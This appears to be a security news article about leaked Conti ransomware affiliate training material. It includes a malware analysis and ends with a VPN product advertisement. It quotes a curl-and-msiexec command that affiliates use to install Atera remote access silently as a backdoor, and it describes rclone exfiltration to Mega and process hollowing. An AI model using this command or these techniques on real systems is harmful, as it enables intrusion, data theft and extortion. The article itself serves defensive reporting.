The inner workings of Conti Ransomware have been revealed as training material given to ransomware affiliates was leaked online earlier this month. The material exposes how affiliates abuse legitimate software and search for cyber insurance policies when using Conti Ransomware on.
The material was leaked by a disgruntled affiliate, who also leaked the IP addresses for Cobalt Strike C2 servers used by the Conti Ransomware gang. A part of this leak was a 113MB archive containing training material for conducting Conti Ransomware attacks.
Due to the leak, security researchers, network admins, and incident responders have a better chance when tackling Conti Ransomware infections.
Advanced Intel’s CEO Vitali Kremez has already capitalized on this already and published new research on how Conti Ransomware attacks work.
One method Kremez noted was the legitimate use of Atera remote access software as a backdoor for continued persistence.
Atera is an interesting alternative to Cobalt Strike, another legitimate piece of Software that can be used for remote access. Due to many different ransomware operations using Cobalt Strike, security software products have become better at detecting it. To prevent this, Kremez states that the Conti gang is installing the legitimate Atera remote access software on compromised systems, which the security software won’t detect.
Kremez states that they have seen the following command used by Conti affiliates to install Atera on a compromised device:
shell curl -o setup.msi “http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com” && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1
“In most of the cases, the adversaries leveraged protonmail[.]com and outlook[.]com email accounts to register with Atera to receive an agent installation script and console access,” explained Kremez.
Kremez advises admins to use tools to block or audit command-line tools in order to detect malicious activity.
“Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts particularly those from C:\ProgramData and C:\Temp directory,” advises Kremez.
A particularly interesting document leaked was titled ‘CobaltStrike MANUAL_V2 .docx’, which lays out the steps an affiliate should take when using Conti Ransomware.
The gang tells users that when the network is breached, they should immediately start exfiltrating data from the compromised network. This is essential as it allows affiliates to carry out double extortion – Threatening victims that if they don’t pay the ransom demands, stolen documents will be sold to the highest bidder.
When exfiltrating data, affiliates are advised to search for documents related to the company’s financials and whether they have a cybersecurity policy. “Search by keywords. need accounting reports. bank statements. for 20-21 years. all fresh. especially important, cyber insurance, security policy documents,” reads the translated Conti Ransomware training document.
The document also tells affiliates to immediately upload the data to Mega, which they used as a hosting platform for the exfiltrated data.
Kremez said that the attackers use the legitimate ‘rclone’ program to upload the data directly to the Mega cloud storage service.
“Rclone config is created and an external location (MEGA in this case) for data synchronization (data cloning) is established. The needed network shares are assigned within the rclone.conf on the victim’s network and a command is executed,” explains Kremez in a blog post.
Conti Ransomware Analysis
Note: The Analysis of Conti Ransomware was carried out by researchers at Vipre Labs.
Conti ransomware encrypts the files of their victims and publishes the data on their website similar to what other strains do. This extortion behavior is visible on their ransom note saying “We’ve downloaded your data and are ready to publish it on our news website”.
When executed, it will start to encrypt files and change the file extension of the encrypted files to .ODMUA. Like other ransomware, it will leave a ransom note that has a filename “readme.txt”.
The Conti ransomware website has an instruction on how to upload the README.txt for the decryption and a contact button at the bottom left of the page. Once you click the contact button, a form will appear where you will provide your contact information and question as shown below.
Conti ransomware will perform a known malware technique called process hollowing. It is where the malware will create a process in a suspended state, unmaps or removes the PE image layout from a given process space using ZwUnmapViewofSection function, write it’s malicious code using WriteProcessMemory, set a new entry point using SetThreadContext, and resume the execution of the suspended process using the ResumeThread function.
Upon research, we found out that the use of -p argument is to encrypt a specific directory with a single thread and the -m argument is to encrypt the files with multiple threads. It means that Conti ransomware has a multi-threading capability. Multi-threading is where main ransomware creates child threads to speed up the encryption.
It will use a string “hsfjuukjzloqu28oajh727190” that was decrypted using the decryption of string routine mentioned above for creating a mutex using CreateMutexA function. Then check if there’s an already running mutex. This was commonly used by ransomware to avoid infecting the system more than once.
It will also delete all the shadow volume copies on the infected system to ensure that the victims won’t be able to recover their encrypted files.
After deleting the shadow copies, Conti ransomware will now start its file encryption by first creating the ransom note which will be first drop in C drive using “CreateFileW” and write the content of its ransom note using “WriteFile”.
As with other ransomware, it will utilize the functions “FindFirstFileW” and “FindNextFileW” to find the files they will encrypt. Conti ransomware has a list of files/file extension and directories which will be excluded for the infection.
When Conti finds the file to be encrypted, it will now generate keys that will be used to encrypt the files. It will used the handle returned by calling the function “CryptAcquireContext” that request a cryptographic context from the Microsoft Enhanced Cryptographic Provider, then the “CryptGenRandom” function to generate cryptographically random bytes, and “CryptEncrypt” function. It leverages AES 256 encryption for their infection.
Then it will open the target file using the “CreateFile” function and retrieve the size of the target file using “GetFileSize”. After this the malware will decrypt different file extensions and check if the file extension of the targeted file is in the list.
Conti ransomware will not just encrypt the files of the infected machine but also spreads and infects the other machine on the same network using SMB protocol.
Attacks like the Conti Ransomware campaign show that cyberattacks are increasing at an exponential rate, and both government and business leaders are underprepared to face the fallout of an attack. There are several tools internet users should use to increase their online protection. One of these tools is SaferNet.
SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories
Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employee’s or family members devices; including activity, time spent online, and threats blocked.